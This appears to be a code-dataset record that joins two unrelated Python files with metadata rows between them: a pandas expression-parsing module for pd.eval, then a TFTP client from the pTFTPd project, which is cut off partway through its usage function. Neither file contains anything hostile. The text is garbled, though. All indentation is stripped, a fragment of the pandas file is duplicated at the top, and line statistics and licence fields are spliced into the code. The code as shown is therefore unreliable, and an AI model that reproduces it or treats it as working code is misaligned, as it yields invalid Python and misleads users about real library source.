"""Get the names in an expression"""
if is_term(self.terms):
return frozenset([self.terms.name])
return frozenset(term.name for term in com.flatten(self.terms))
_parsers = {'python': PythonExprVisitor, 'pandas': PandasExprVisitor}
| 34.175758
| 79
| 0.601702
|
import ast
import operator
import sys
import inspect
import tokenize
import datetime
from functools import partial
import pandas as pd
from pandas import compat
from pandas.compat import StringIO, lmap, zip, reduce, string_types
from pandas.core.base import StringMixin
from pandas.core import common as com
from pandas.tools.util import compose
from pandas.computation.ops import (_cmp_ops_syms, _bool_ops_syms,
_arith_ops_syms, _unary_ops_syms, is_term)
from pandas.computation.ops import _reductions, _mathops, _LOCAL_TAG
from pandas.computation.ops import Op, BinOp, UnaryOp, Term, Constant, Div
from pandas.computation.ops import UndefinedVariableError
from pandas.computation.scope import Scope, _ensure_scope
def tokenize_string(source):
line_reader = StringIO(source).readline
for toknum, tokval, _, _, _ in tokenize.generate_tokens(line_reader):
yield toknum, tokval
def _rewrite_assign(tok):
toknum, tokval = tok
return toknum, '==' if tokval == '=' else tokval
def _replace_booleans(tok):
toknum, tokval = tok
if toknum == tokenize.OP:
if tokval == '&':
return tokenize.NAME, 'and'
elif tokval == '|':
return tokenize.NAME, 'or'
return toknum, tokval
return toknum, tokval
def _replace_locals(tok):
toknum, tokval = tok
if toknum == tokenize.OP and tokval == '@':
return tokenize.OP, _LOCAL_TAG
return toknum, tokval
def _preparse(source, f=compose(_replace_locals, _replace_booleans,
_rewrite_assign)):
assert callable(f), 'f must be callable'
return tokenize.untokenize(lmap(f, tokenize_string(source)))
def _is_type(t):
return lambda x: isinstance(x.value, t)
_is_list = _is_type(list)
_is_str = _is_type(string_types)
_all_nodes = frozenset(filter(lambda x: isinstance(x, type) and
issubclass(x, ast.AST),
(getattr(ast, node) for node in dir(ast))))
def _filter_nodes(superclass, all_nodes=_all_nodes):
node_names = (node.__name__ for node in all_nodes
if issubclass(node, superclass))
return frozenset(node_names)
_all_node_names = frozenset(map(lambda x: x.__name__, _all_nodes))
_mod_nodes = _filter_nodes(ast.mod)
_stmt_nodes = _filter_nodes(ast.stmt)
_expr_nodes = _filter_nodes(ast.expr)
_expr_context_nodes = _filter_nodes(ast.expr_context)
_slice_nodes = _filter_nodes(ast.slice)
_boolop_nodes = _filter_nodes(ast.boolop)
_operator_nodes = _filter_nodes(ast.operator)
_unary_op_nodes = _filter_nodes(ast.unaryop)
_cmp_op_nodes = _filter_nodes(ast.cmpop)
_comprehension_nodes = _filter_nodes(ast.comprehension)
_handler_nodes = _filter_nodes(ast.excepthandler)
_arguments_nodes = _filter_nodes(ast.arguments)
_keyword_nodes = _filter_nodes(ast.keyword)
_alias_nodes = _filter_nodes(ast.alias)
_hacked_nodes = frozenset(['Assign', 'Module', 'Expr'])
_unsupported_expr_nodes = frozenset(['Yield', 'GeneratorExp', 'IfExp',
'DictComp', 'SetComp', 'Repr', 'Lambda',
'Set', 'AST', 'Is', 'IsNot'])
# these nodes are low priority or won't ever be supported (e.g., AST)
_unsupported_nodes = ((_stmt_nodes | _mod_nodes | _handler_nodes |
_arguments_nodes | _keyword_nodes | _alias_nodes |
_expr_context_nodes | _unsupported_expr_nodes) -
_hacked_nodes)
# and we don't want `stmt` and friends in their so get only the class whose
_base_supported_nodes = (_all_node_names - _unsupported_nodes) | _hacked_nodes
_msg = 'cannot both support and not support {0}'.format(_unsupported_nodes &
_base_supported_nodes)
assert not _unsupported_nodes & _base_supported_nodes, _msg
def _node_not_implemented(node_name, cls):
def f(self, *args, **kwargs):
raise NotImplementedError("{0!r} nodes are not "
"implemented".format(node_name))
return f
def disallow(nodes):
def disallowed(cls):
cls.unsupported_nodes = ()
for node in nodes:
new_method = _node_not_implemented(node, cls)
name = 'visit_{0}'.format(node)
cls.unsupported_nodes += (name,)
setattr(cls, name, new_method)
return cls
return disallowed
def _op_maker(op_class, op_symbol):
def f(self, node, *args, **kwargs):
return partial(op_class, op_symbol, *args, **kwargs)
return f
_op_classes = {'binary': BinOp, 'unary': UnaryOp}
def add_ops(op_classes):
def f(cls):
for op_attr_name, op_class in compat.iteritems(op_classes):
ops = getattr(cls, '{0}_ops'.format(op_attr_name))
ops_map = getattr(cls, '{0}_op_nodes_map'.format(op_attr_name))
for op in ops:
op_node = ops_map[op]
if op_node is not None:
made_op = _op_maker(op_class, op)
setattr(cls, 'visit_{0}'.format(op_node), made_op)
return cls
return f
@disallow(_unsupported_nodes)
@add_ops(_op_classes)
class BaseExprVisitor(ast.NodeVisitor):
const_type = Constant
term_type = Term
binary_ops = _cmp_ops_syms + _bool_ops_syms + _arith_ops_syms
binary_op_nodes = ('Gt', 'Lt', 'GtE', 'LtE', 'Eq', 'NotEq', 'In', 'NotIn',
'BitAnd', 'BitOr', 'And', 'Or', 'Add', 'Sub', 'Mult',
None, 'Pow', 'FloorDiv', 'Mod')
binary_op_nodes_map = dict(zip(binary_ops, binary_op_nodes))
unary_ops = _unary_ops_syms
unary_op_nodes = 'UAdd', 'USub', 'Invert', 'Not'
unary_op_nodes_map = dict(zip(unary_ops, unary_op_nodes))
rewrite_map = {
ast.Eq: ast.In,
ast.NotEq: ast.NotIn,
ast.In: ast.In,
ast.NotIn: ast.NotIn
}
def __init__(self, env, engine, parser, preparser=_preparse):
self.env = env
self.engine = engine
self.parser = parser
self.preparser = preparser
self.assigner = None
def visit(self, node, **kwargs):
if isinstance(node, string_types):
clean = self.preparser(node)
node = ast.fix_missing_locations(ast.parse(clean))
method = 'visit_' + node.__class__.__name__
visitor = getattr(self, method)
return visitor(node, **kwargs)
def visit_Module(self, node, **kwargs):
if len(node.body) != 1:
raise SyntaxError('only a single expression is allowed')
expr = node.body[0]
return self.visit(expr, **kwargs)
def visit_Expr(self, node, **kwargs):
return self.visit(node.value, **kwargs)
def _rewrite_membership_op(self, node, left, right):
op_instance = node.op
op_type = type(op_instance)
if is_term(left) and is_term(right) and op_type in self.rewrite_map:
left_list, right_list = map(_is_list, (left, right))
left_str, right_str = map(_is_str, (left, right))
if left_list or right_list or left_str or right_str:
op_instance = self.rewrite_map[op_type]()
if right_str:
self.env.remove_tmp(right.name)
name = self.env.add_tmp([right.value])
right = self.term_type(name, self.env)
if left_str:
self.env.remove_tmp(left.name)
name = self.env.add_tmp([left.value])
left = self.term_type(name, self.env)
op = self.visit(op_instance)
return op, op_instance, left, right
def _possibly_transform_eq_ne(self, node, left=None, right=None):
if left is None:
left = self.visit(node.left, side='left')
if right is None:
right = self.visit(node.right, side='right')
op, op_class, left, right = self._rewrite_membership_op(node, left,
right)
return op, op_class, left, right
def _possibly_eval(self, binop, eval_in_python):
return binop.evaluate(self.env, self.engine, self.parser,
self.term_type, eval_in_python)
def _possibly_evaluate_binop(self, op, op_class, lhs, rhs,
eval_in_python=('in', 'not in'),
maybe_eval_in_python=('==', '!=', '<', '>',
'<=', '>=')):
res = op(lhs, rhs)
if self.engine != 'pytables':
if (res.op in _cmp_ops_syms
and getattr(lhs, 'is_datetime', False)
or getattr(rhs, 'is_datetime', False)):
# well with NaT
return self._possibly_eval(res, self.binary_ops)
if res.op in eval_in_python:
# "in"/"not in" ops are always evaluated in python
return self._possibly_eval(res, eval_in_python)
elif self.engine != 'pytables':
if (getattr(lhs, 'return_type', None) == object
or getattr(rhs, 'return_type', None) == object):
# evaluate "==" and "!=" in python if either of our operands
# has an object return type
return self._possibly_eval(res, eval_in_python +
maybe_eval_in_python)
return res
def visit_BinOp(self, node, **kwargs):
op, op_class, left, right = self._possibly_transform_eq_ne(node)
return self._possibly_evaluate_binop(op, op_class, left, right)
def visit_Div(self, node, **kwargs):
truediv = self.env.scope['truediv']
return lambda lhs, rhs: Div(lhs, rhs, truediv)
def visit_UnaryOp(self, node, **kwargs):
op = self.visit(node.op)
operand = self.visit(node.operand)
return op(operand)
def visit_Name(self, node, **kwargs):
return self.term_type(node.id, self.env, **kwargs)
def visit_NameConstant(self, node, **kwargs):
return self.const_type(node.value, self.env)
def visit_Num(self, node, **kwargs):
return self.const_type(node.n, self.env)
def visit_Str(self, node, **kwargs):
name = self.env.add_tmp(node.s)
return self.term_type(name, self.env)
def visit_List(self, node, **kwargs):
name = self.env.add_tmp([self.visit(e).value for e in node.elts])
return self.term_type(name, self.env)
visit_Tuple = visit_List
def visit_Index(self, node, **kwargs):
return self.visit(node.value)
def visit_Subscript(self, node, **kwargs):
value = self.visit(node.value)
slobj = self.visit(node.slice)
result = pd.eval(slobj, local_dict=self.env, engine=self.engine,
parser=self.parser)
try:
# a Term instance
v = value.value[result]
except AttributeError:
# an Op instance
lhs = pd.eval(value, local_dict=self.env, engine=self.engine,
parser=self.parser)
v = lhs[result]
name = self.env.add_tmp(v)
return self.term_type(name, env=self.env)
def visit_Slice(self, node, **kwargs):
lower = node.lower
if lower is not None:
lower = self.visit(lower).value
upper = node.upper
if upper is not None:
upper = self.visit(upper).value
step = node.step
if step is not None:
step = self.visit(step).value
return slice(lower, upper, step)
def visit_Assign(self, node, **kwargs):
if len(node.targets) != 1:
raise SyntaxError('can only assign a single expression')
if not isinstance(node.targets[0], ast.Name):
raise SyntaxError('left hand side of an assignment must be a '
'single name')
if self.env.target is None:
raise ValueError('cannot assign without a target object')
try:
assigner = self.visit(node.targets[0], **kwargs)
except UndefinedVariableError:
assigner = node.targets[0].id
self.assigner = getattr(assigner, 'name', assigner)
if self.assigner is None:
raise SyntaxError('left hand side of an assignment must be a '
'single resolvable name')
return self.visit(node.value, **kwargs)
def visit_Attribute(self, node, **kwargs):
attr = node.attr
value = node.value
ctx = node.ctx
if isinstance(ctx, ast.Load):
# resolve the value
resolved = self.visit(value).value
try:
v = getattr(resolved, attr)
name = self.env.add_tmp(v)
return self.term_type(name, self.env)
except AttributeError:
# something like datetime.datetime where scope is overridden
if isinstance(value, ast.Name) and value.id == attr:
return resolved
raise ValueError("Invalid Attribute context {0}".format(ctx.__name__))
def visit_Call(self, node, side=None, **kwargs):
# this can happen with: datetime.datetime
if isinstance(node.func, ast.Attribute):
res = self.visit_Attribute(node.func)
elif not isinstance(node.func, ast.Name):
raise TypeError("Only named functions are supported")
else:
res = self.visit(node.func)
if res is None:
raise ValueError("Invalid function call {0}".format(node.func.id))
if hasattr(res, 'value'):
res = res.value
args = [self.visit(targ).value for targ in node.args]
if node.starargs is not None:
args += self.visit(node.starargs).value
keywords = {}
for key in node.keywords:
if not isinstance(key, ast.keyword):
raise ValueError("keyword error in function call "
"'{0}'".format(node.func.id))
keywords[key.arg] = self.visit(key.value).value
if node.kwargs is not None:
keywords.update(self.visit(node.kwargs).value)
return self.const_type(res(*args, **keywords), self.env)
def translate_In(self, op):
return op
def visit_Compare(self, node, **kwargs):
ops = node.ops
comps = node.comparators
# base case: we have something like a CMP b
if len(comps) == 1:
op = self.translate_In(ops[0])
binop = ast.BinOp(op=op, left=node.left, right=comps[0])
return self.visit(binop)
# recursive case: we have a chained comparison, a CMP b CMP c, etc.
left = node.left
values = []
for op, comp in zip(ops, comps):
new_node = self.visit(ast.Compare(comparators=[comp], left=left,
ops=[self.translate_In(op)]))
left = comp
values.append(new_node)
return self.visit(ast.BoolOp(op=ast.And(), values=values))
def _try_visit_binop(self, bop):
if isinstance(bop, (Op, Term)):
return bop
return self.visit(bop)
def visit_BoolOp(self, node, **kwargs):
def visitor(x, y):
lhs = self._try_visit_binop(x)
rhs = self._try_visit_binop(y)
op, op_class, lhs, rhs = self._possibly_transform_eq_ne(node, lhs,
rhs)
return self._possibly_evaluate_binop(op, node.op, lhs, rhs)
operands = node.values
return reduce(visitor, operands)
_python_not_supported = frozenset(['Dict', 'Call', 'BoolOp', 'In', 'NotIn'])
_numexpr_supported_calls = frozenset(_reductions + _mathops)
@disallow((_unsupported_nodes | _python_not_supported) -
(_boolop_nodes | frozenset(['BoolOp', 'Attribute', 'In', 'NotIn',
'Tuple'])))
class PandasExprVisitor(BaseExprVisitor):
def __init__(self, env, engine, parser,
preparser=partial(_preparse, f=compose(_replace_locals,
_replace_booleans))):
super(PandasExprVisitor, self).__init__(env, engine, parser, preparser)
@disallow(_unsupported_nodes | _python_not_supported | frozenset(['Not']))
class PythonExprVisitor(BaseExprVisitor):
def __init__(self, env, engine, parser, preparser=lambda x: x):
super(PythonExprVisitor, self).__init__(env, engine, parser,
preparser=preparser)
class Expr(StringMixin):
def __init__(self, expr, engine='numexpr', parser='pandas', env=None,
truediv=True, level=0):
self.expr = expr
self.env = env or Scope(level=level + 1)
self.engine = engine
self.parser = parser
self.env.scope['truediv'] = truediv
self._visitor = _parsers[parser](self.env, self.engine, self.parser)
self.terms = self.parse()
@property
def assigner(self):
return getattr(self._visitor, 'assigner', None)
def __call__(self):
return self.terms(self.env)
def __unicode__(self):
return com.pprint_thing(self.terms)
def __len__(self):
return len(self.expr)
def parse(self):
return self._visitor.visit(self.expr)
@property
def names(self):
if is_term(self.terms):
return frozenset([self.terms.name])
return frozenset(term.name for term in com.flatten(self.terms))
_parsers = {'python': PythonExprVisitor, 'pandas': PandasExprVisitor}
| true
| true
|
1c40dcf9fed1df342a46112c9315c08080e2084f
| 25,926
|
py
|
Python
|
tftpclient.py
|
xdutaotao/flashboot
|
307f65af0cf5d8e6de04cc11916017d1f5d6a8a0
|
[
"Apache-2.0"
] | 1
|
2018-11-28T13:11:51.000Z
|
2018-11-28T13:11:51.000Z
|
tftpclient.py
|
xdutaotao/flashboot
|
307f65af0cf5d8e6de04cc11916017d1f5d6a8a0
|
[
"Apache-2.0"
] | null | null | null |
tftpclient.py
|
xdutaotao/flashboot
|
307f65af0cf5d8e6de04cc11916017d1f5d6a8a0
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# coding=utf-8
# Author: Maxime Petazzoni
# maxime.petazzoni@bulix.org
#
# This file is part of pTFTPd.
#
# pTFTPd is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# pTFTPd is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with pTFTPd. If not, see <http://www.gnu.org/licenses/>.
from __future__ import print_function
try:
# noinspection PyShadowingBuiltins
input = raw_input # Py2
except NameError:
pass # Py3
"""Simple TFTP client.
This is a very simple TFTP client that supports pull/push files from a
TFTP server. It fully supports the TFTP specification as defined in
RFC1350. It also supports the TFTP Option Extension protocol (per
RFC2347), the block size option as defined in RFC2348 and the transfer
size option from RFC2349.
Note that this program currently does *not* support the timeout
interval option from RFC2349.
"""
from datetime import datetime
import os
import shutil
import socket
import stat
import sys
import tempfile
import notify
import proto
import state
l = notify.getLogger('tftp')
# UDP datagram size
_UDP_TRANSFER_SIZE = 2**16
_PTFTP_DEFAULT_PORT = 69
_PTFTP_DEFAULT_HOST = 'localhost'
_PTFTP_DEFAULT_MODE = 'octet'
_PTFTP_DEFAULT_OPTS = {
proto.TFTP_OPTION_BLKSIZE: proto.TFTP_LAN_PACKET_SIZE,
proto.TFTP_OPTION_WINDOWSIZE: proto.TFTP_LAN_WINDOW_SIZE,
}
_PTFTP_RFC1350_OPTS = {
proto.TFTP_OPTION_BLKSIZE: proto.TFTP_DEFAULT_PACKET_SIZE,
}
# noinspection PyPep8Naming
class UDPMessageSocket(object):
"""A wrapper around a UDP datagram socket that provides per-message
receival semantics.
This wrapper is very specific to the TFTP client use case. Messages are
expected to be received one at a time, expect for DATA messages which may
come streaming when a window size greater than one is negotiated between
the client and the server. When that's the case, reading from the socket
returns more than one message but the client (and its state machine) still
expects to process them one at a time.
By utilizing the knowledge of the expected size of those DATA messages
(based on the negotiated block size) this wrapper slices the received data
accordingly to expose the desired one-at-a-time semantics.
"""
def __init__(self):
self._sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.reset()
@property
def rport(self):
return self._rport
def settimeout(self, timeout):
self._sock.settimeout(timeout)
def send(self, message, peer):
self._sock.sendto(message, peer)
def reset(self):
self._buffer = None
self._rport = None
def close(self):
self._sock.close()
def recv(self, blksize):
if not self._buffer:
self._recv()
if not self._buffer:
return None
opcode = proto.TFTPHelper.get_opcode(self._buffer)
if opcode == proto.OP_DATA:
size = proto.TFTPHelper.get_data_size(blksize)
data, self._buffer = self._buffer[:size], self._buffer[size:]
else:
data, self._buffer = self._buffer, None
return data
def _recv(self):
(data, (address, port)) = self._sock.recvfrom(_UDP_TRANSFER_SIZE)
if not self._rport:
self._rport = port
elif port != self._rport:
# Ignore packets from other peers
return
self._buffer = data
# noinspection PyPep8Naming
class TFTPClient(object):
"""
A small and simple TFTP client to pull/push files from a TFTP server.
"""
PTFTP_STATE = None
def __init__(self, peer, opts=None, mode='octet', rfc1350=False,
notification_callbacks=None):
"""
Initializes the TFTP client.
Args:
peer (tuple): a (host, port) tuple describing the server to connect
to.
opts (dict): a dictionnary of TFTP option values to use,
or None to disable them (defaults to None).
mode (string): the transfer mode to use by default, must be one of
TFTP_MODES (defaults to octet).
notification_callbacks (dict): a dictionary of notification
callbacks to use for the callback notification engine.
"""
if notification_callbacks is None:
notification_callbacks = {}
self.peer = peer
self.transfer_mode = mode
self.error = False
self.rfc1350 = rfc1350
self.opts = opts
if rfc1350:
self.opts = _PTFTP_RFC1350_OPTS
print('Running in RFC1350 compliance mode.')
else:
if not self.opts:
self.opts = _PTFTP_DEFAULT_OPTS
# This one is mandatory
if proto.TFTP_OPTION_BLKSIZE not in self.opts:
self.opts[proto.TFTP_OPTION_BLKSIZE] = \
_PTFTP_DEFAULT_OPTS[proto.TFTP_OPTION_BLKSIZE]
# Finally, install the provided callbacks
notify.CallbackEngine.install(l, notification_callbacks)
def connect(self):
"""
Connects the sock to the remote host. Because TFTP is an UDP
protocol, this has barely no effect.
Args:
None.
"""
self.sock = UDPMessageSocket()
self.sock.settimeout(state.STATE_TIMEOUT_SECS)
print('Connected to {}:{}.'.format(self.peer[0], self.peer[1]))
def finish(self):
"""
Closes the connection with the server.
Args:
None.
"""
self.sock.close()
def serve_forever(self):
"""
Serve the client prompt until the user exits the program.
Args:
None.
"""
self.connect()
while True:
print()
try:
command = input('tftp> ')
except EOFError:
print()
break
if not command:
continue
cmd_parts = command.split(' ')
if cmd_parts[0] in ('?', 'help'):
self.usage()
elif cmd_parts[0] in ('g', 'get'):
self.get(cmd_parts[1:])
elif cmd_parts[0] in ('p', 'put'):
self.put(cmd_parts[1:])
elif cmd_parts[0] in ('q', 'quit'):
break
elif cmd_parts[0] in ('m', 'mode'):
self.mode(cmd_parts[1:])
elif cmd_parts[0] in ('b', 'blksize'):
self.blksize(cmd_parts[1:])
elif cmd_parts[0] in ('w', 'windowsize'):
self.windowsize(cmd_parts[1:])
else:
print('Unrecognized command. Try help.')
self.finish()
def usage(self):
"""
Display the client help to the user.
Args:
None.
"""
print('Available commands:')
print()
print('? help Display help')
print('q quit Quit the TFTP client')
print('m mode [newmode] Display or change transfer mode')
print('b blksize [newsize] Display or change the transfer block size')
print('w windowsize [newsize] Display or change the transfer window size')
print()
print('g get [-f] <filename> Get <filename> from server.')
print(' (use -f to overwrite local file)')
print('p put <filename> Push <filename> to the server')
print()
def handle(self):
"""
Handle an incoming TFTP packet and dispatch it to one of the
serve<op> methods below.
Args:
None.
"""
if not self.PTFTP_STATE:
self.error = (True, 'Connection state error.')
return
# Reset the error flag
self.error = False
self.sock.reset()
# Process incoming packet until the state is cleared by the
# end of a succesfull transmission or an error
while not self.PTFTP_STATE.done and not self.error:
try:
blksize = self.opts[proto.TFTP_OPTION_BLKSIZE]
request = self.sock.recv(blksize)
if not request:
continue
except socket.timeout:
self.error = (True, 'Connection timed out.')
return
if not self.PTFTP_STATE.tid:
self.PTFTP_STATE.tid = self.sock.rport
print('Communicating with {}:{}.'
.format(self.peer[0], self.PTFTP_STATE.tid))
# Reset the response packet
response = None
# Get the packet opcode and dispatch
opcode = proto.TFTPHelper.get_opcode(request)
if not opcode:
self.error = (True, None)
response = proto.TFTPHelper.createERROR(proto.ERROR_ILLEGAL_OP)
elif opcode not in proto.TFTP_OPS:
self.error = (True,
"Unknown or unsupported operation %d!" % opcode)
response = proto.TFTPHelper.createERROR(proto.ERROR_ILLEGAL_OP)
else:
try:
handler = getattr(self, "serve%s" % proto.TFTP_OPS[opcode])
response = handler(opcode, request[2:])
except AttributeError:
self.error = (True, 'Operation not supported.')
response = proto.TFTPHelper.createERROR(
proto.ERROR_UNDEF, 'Operation not supported.')
# Finally, send the response if we have one
if response:
peer = (self.peer[0], self.PTFTP_STATE.tid)
self.sock.send(response, peer)
def serveOACK(self, op, request):
"""
Serves OACK packets.
Args:
op (integer): the TFTP opcode.
request (string): the TFTP packet without its opcode.
Returns:
A response packet (as a string) or None if the request is
ignored or completed.
"""
try:
opts = proto.TFTPHelper.parseOACK(request)
except SyntaxError:
# Ignore malfored OACK packets
return None
if not self.PTFTP_STATE:
return proto.TFTPHelper.createERROR(proto.ERROR_UNKNOWN_ID)
# Analyze received options
opts = proto.TFTPHelper.parse_options(opts)
if opts:
# HOOK: this is where we should check that we accept the
# options provided by the server (tsize/timeout/...).
self.PTFTP_STATE.set_opts(opts)
else:
self.error = (True, 'Transfer options parsing failed.')
self.PTFTP_STATE.state = state.STATE_ERROR
self.PTFTP_STATE.error = proto.ERROR_OPTION_NEGOCIATION
if self.PTFTP_STATE.state == state.STATE_RECV:
self.PTFTP_STATE.state = state.STATE_RECV_ACK
return self.PTFTP_STATE.next()
def serveACK(self, op, request):
"""
Serves ACK packets.
Args:
op (integer): the TFTP opcode.
request (string): the TFTP packet without its opcode.
Returns:
A response packet (as a string) or None if the request is
ignored or completed.
"""
try:
num = proto.TFTPHelper.parseACK(request)
except SyntaxError:
# Ignore malfored ACK packets
return None
if not self.PTFTP_STATE:
return proto.TFTPHelper.createERROR(proto.ERROR_UNKNOWN_ID)
if self.PTFTP_STATE.state == state.STATE_SEND:
if self.PTFTP_STATE.packetnum != num:
self.error = (True,
'Got ACK with incoherent data packet number.')
self.PTFTP_STATE.state = state.STATE_ERROR
self.PTFTP_STATE.error = proto.ERROR_ILLEGAL_OP
if not self.rfc1350 and num >= proto.TFTP_PACKETNUM_MAX-1:
print('Packet number wraparound.')
return self.PTFTP_STATE.next()
elif self.PTFTP_STATE.state == state.STATE_SEND_LAST:
self.PTFTP_STATE.done = True
return None
print('ERROR: Unexpected ACK!')
self.error = (True, None)
return proto.TFTPHelper.createERROR(proto.ERROR_ILLEGAL_OP)
def serveDATA(self, op, request):
"""
Serves DATA packets.
Args:
op (integer): the TFTP opcode.
request (string): the TFTP packet without its opcode.
Returns:
A response packet (as a string) or None if the request is
ignored for some reason.
"""
try:
num, data = proto.TFTPHelper.parseDATA(request)
except SyntaxError:
# Ignore malformed DATA packets
return None
if not self.PTFTP_STATE:
return proto.TFTPHelper.createERROR(proto.ERROR_UNKNOWN_ID)
if len(data) > self.PTFTP_STATE.opts[proto.TFTP_OPTION_BLKSIZE]:
self.error = (True, None)
return proto.TFTPHelper.createERROR(proto.ERROR_ILLEGAL_OP)
if self.PTFTP_STATE.state == state.STATE_RECV:
if num != self.PTFTP_STATE.packetnum:
self.error = (True, 'Got DATA with incoherent packet number.')
self.PTFTP_STATE.state = state.STATE_ERROR
self.PTFTP_STATE.error = proto.ERROR_ILLEGAL_OP
else:
self.PTFTP_STATE.data = data
if not self.PTFTP_STATE.done and not self.rfc1350 and \
num >= proto.TFTP_PACKETNUM_MAX - 1:
print('Packet number wraparound.')
return self.PTFTP_STATE.next()
print('ERROR: Unexpected DATA!')
self.error = (True, None)
return proto.TFTPHelper.createERROR(proto.ERROR_ILLEGAL_OP)
def serveERROR(self, op, request):
"""
Serves ERROR packets.
Args:
op (integer): the TFTP opcode.
request (string): the TFTP packet without its opcode.
Returns:
A response packet (as a string) or None if the request is
ignored for some reason.
"""
try:
errno, errmsg = proto.TFTPHelper.parseERROR(request)
except SyntaxError:
# Ignore malformed ERROR packets
return None
# Clearing state
if self.PTFTP_STATE.op == proto.OP_RRQ:
self.PTFTP_STATE.purge()
self.error = (True, errmsg)
return None
def get(self, args):
"""
Implements the GET command to retrieve a file from the server.
Args:
args (list): the list of arguments passed to the command.
Returns:
True or False depending on the success of the operation.
"""
if len(args) < 1 or len(args) > 2:
print('Usage: get [-f] <filename>')
return False
filepath = args[0]
overwrite = False
if len(args) == 2:
filepath = args[1]
if args[0] == '-f':
overwrite = True
(_, filename) = os.path.split(filepath)
# First, check we're not going to overwrite an existing file
if not overwrite:
try:
open(filename)
print('Error: local file {} already exists!'.format(filename))
print('Use get -f to overwrite the local file.')
return False
except IOError:
pass
self.PTFTP_STATE = state.TFTPState(self.peer, proto.OP_RRQ,
'', filepath, self.transfer_mode,
not self.rfc1350)
# Then, before sending anything to the server, open the file
# for writing
try:
# We don't want tempfile to automatically delete the temporary
# file on close() as we have to copy its content to the destination
# file first. We'll handle it's deletion on our own.
self.PTFTP_STATE.file = tempfile.NamedTemporaryFile(delete=False)
self.PTFTP_STATE.packetnum = 1
self.PTFTP_STATE.state = state.STATE_RECV
except IOError as e:
print('Error: {}'.format(os.strerror(e.errno)))
print('Can\'t write to temporary file {}!'
.format(self.PTFTP_STATE.file.name))
return False
opts = dict(self.opts)
# When not running in RFC1350 compliance mode, append tsize: 0
# to the list of options in the request to get the requested
# file size back in the OACK.
if not self.rfc1350:
opts[proto.TFTP_OPTION_TSIZE] = 0
# Everything's OK, let's go
print("Retrieving '%s' from the remote host..." % filename)
packet = proto.TFTPHelper.createRRQ(filepath, self.transfer_mode, opts)
transfer_start = datetime.today()
self.sock.send(packet, self.peer)
self.handle()
transfer_time = datetime.today() - transfer_start
if self.error:
error, errmsg = self.error
if error and errmsg:
print('Error: {}'.format(errmsg))
# Remove the temporary file on error. The destionation file,
# if it already existed, is left untouched.
self.PTFTP_STATE.file.close()
os.remove(self.PTFTP_STATE.file.name)
return False
# Copy the temporary file to its final destination
try:
shutil.copy(self.PTFTP_STATE.file.name, filename)
except IOError as e:
print('Error: {}'.format(os.strerror(e.errno)))
print('Can\'t copy temporary file to local file {}!'
.format(filename))
return False
print('Transfer complete, {} bytes ({:.2f} kB/s)'
.format(self.PTFTP_STATE.filesize,
self.__get_speed(self.PTFTP_STATE.filesize,
transfer_time)))
self.PTFTP_STATE.file.close()
os.remove(self.PTFTP_STATE.file.name)
return True
def put(self, args):
"""
Implements the PUT command to push a file to the server.
Args:
args (list): the list of arguments passed to the command.
Returns:
True or False depending on the success of the operation.
"""
if len(args) != 1:
print('Usage: put <filename>')
return
filepath = args[0]
self.PTFTP_STATE = state.TFTPState(self.peer, proto.OP_WRQ,
'', filepath, self.transfer_mode,
not self.rfc1350)
try:
self.PTFTP_STATE.file = open(filepath, 'rb')
self.PTFTP_STATE.filesize = os.stat(filepath)[stat.ST_SIZE]
self.PTFTP_STATE.packetnum = 0
self.PTFTP_STATE.state = state.STATE_SEND
except IOError as e:
print('Error: {}'.format(os.strerror(e.errno)))
print('Can\'t read from local file {}!'.format(filepath))
return False
opts = dict(self.opts)
# When not running in RFC1350 compliance mode, append the
# tsize option to the request options to specify the
# transfered file size to the server.
if not self.rfc1350:
opts[proto.TFTP_OPTION_TSIZE] = self.PTFTP_STATE.filesize
# Everything's OK, let's go
print("Pushing '%s' to the remote host..." % filepath)
packet = proto.TFTPHelper.createWRQ(filepath, self.transfer_mode, opts)
transfer_start = datetime.today()
self.sock.send(packet, self.peer)
self.handle()
transfer_time = datetime.today() - transfer_start
if self.error:
error, errmsg = self.error
if error and errmsg:
print('Error: {}'.format(errmsg))
return False
print('Transfer complete, {} bytes ({:.2f} kB/s)'
.format(self.PTFTP_STATE.filesize,
self.__get_speed(self.PTFTP_STATE.filesize,
transfer_time)))
return True
def mode(self, args):
if len(args) > 1:
print('Usage: mode [newmode]')
return
if not len(args):
print('Current transfer mode: {}.'.format(self.transfer_mode))
print('Available transfer modes: {}'
.format(', '.join(proto.TFTP_MODES)))
return
if args[0].lower() in proto.TFTP_MODES:
self.transfer_mode = args[0].lower()
print('Mode set to {}.'.format(self.transfer_mode))
else:
print('Unknown transfer mode, use one of: {}'
.format(', '.join(proto.TFTP_MODES)))
def blksize(self, args):
if len(args) > 1:
print('Usage: blksize [newsize]')
return
if not len(args):
print('Current block size: {} byte(s).'
.format(self.opts[proto.TFTP_OPTION_BLKSIZE]))
return
try:
self.opts[proto.TFTP_OPTION_BLKSIZE] = int(args[0])
print('Block size set to {} byte(s).'
.format(self.opts[proto.TFTP_OPTION_BLKSIZE]))
except ValueError:
print('Block size must be a number!')
def windowsize(self, args):
if len(args) > 1:
print('Usage: windowsize [newsize]')
return
if not len(args):
print('Current window size: {} packet(s).'
.format(self.opts[proto.TFTP_OPTION_WINDOWSIZE]))
return
try:
self.opts[proto.TFTP_OPTION_WINDOWSIZE] = int(args[0])
print('Window size set to {} packet(s).'
.format(self.opts[proto.TFTP_OPTION_WINDOWSIZE]))
except ValueError:
print('Window size must be a number!')
def __get_speed(self, filesize, time):
return (filesize / 1024.0 /
(time.seconds + time.microseconds / 1000000.0))
def usage():
print("usage: %s [options]" % sys.argv[0])
print()
print(" -? --help Get help")
print(" -h --host <host> Set TFTP server (default: %s)" % _PTFTP_DEFAULT_HOST)
print(" -p --port <port> Define the port to connect to (default: %d)" % _PTFTP_DEFAULT_PORT)
print(" -m --mode <mode> Set transfer mode (default: %s)" % _PTFTP_DEFAULT_MODE)
print(" Must be one of:", ', '.join(proto.TFTP_MODES))
print()
print("Available extra options (using the TFTP option extension protocol):")
print(" -b --blksize <n> Set transfer block size (default: %d bytes)" % proto.TFTP_LAN_PACKET_SIZE)
